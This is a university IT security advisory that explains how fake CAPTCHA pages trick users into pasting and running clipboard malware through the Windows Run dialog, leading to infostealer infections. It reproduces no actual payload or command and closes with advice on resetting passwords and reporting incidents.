What is a Fake CAPTCHA?
We are all used to browsing to websites and being asked to complete a CAPTCHA verification. These are simple tests that aim to determine whether a user is human, and they are presented in different ways; some may be selecting images with a specific item inside, similar to the image below, or they could be typing in a series of letters and numbers that appear in a distorted image on screen.
Threat actors are now creating fake CAPTCHA tests on websites that request a user perform a set of simple instructions that are presented as legitimate, but will in fact run malicious code.
Typically, these CAPTCHAs are on malicious websites which people are directed to via a phishing attack, or these could be placed on a legitimate website which has been hijacked to display malicious content. We have seen this within the University of Staffordshire targeting our users, the image below displays one example:
How do these work?
If you click on the “I’m not a robot” button, it will secretly copy malicious code to your device clipboard without any notification – you won’t know!
The “Verification Steps” pop-up will then appear on your screen with instruction to:
1) “Press Windows Button + R” – this will open the “Run” dialogue box which is used to launch programs, or files.
2) “Press CTRL + V” – this will paste the copied malicious code into the free-type area of the “Run” dialogue box.
3) “Press Enter” – this will run the malicious code on your device.
Even though the code can appear to be random letters and number, it is actually malicious code in disguise that will execute a malware file. Sometimes the code can look less suspicious:
However, it is simply being presented in a way that seems more legitimate, but it is simply disguising the code, and the outcome will remain the same – it will execute malware on your device.
IMPORTANT: Genuine CAPTCHA verifications will not ask you to perform the commands noted above, or to load any additional programs or windows.
The ultimate purpose behind this is to run malicious code, and often this leads to “infostealer” malware being executed (such as the notorious Lumma Stealer), which aims to steal passwords and sessions tokens that have been saved, or are in use in your browser. This mean that your accounts can easily be accessed, and they can even bypass the multi-factor authentication (MFA) requirements, and controls.
This type of malware is designed to be covert so there are often no obvious signs that anything malicious has taken place until the stolen credentials and tokens are used to take over an account.
If you have fallen victim to this scan, and your staff account or device may be affected, please reset your password immediately from a different (non-infected) device and contact Digital Services – we will be more than happy to assist!
Remember, we would rather you report a legitimate email to us if you are unsure than to miss a malicious one!
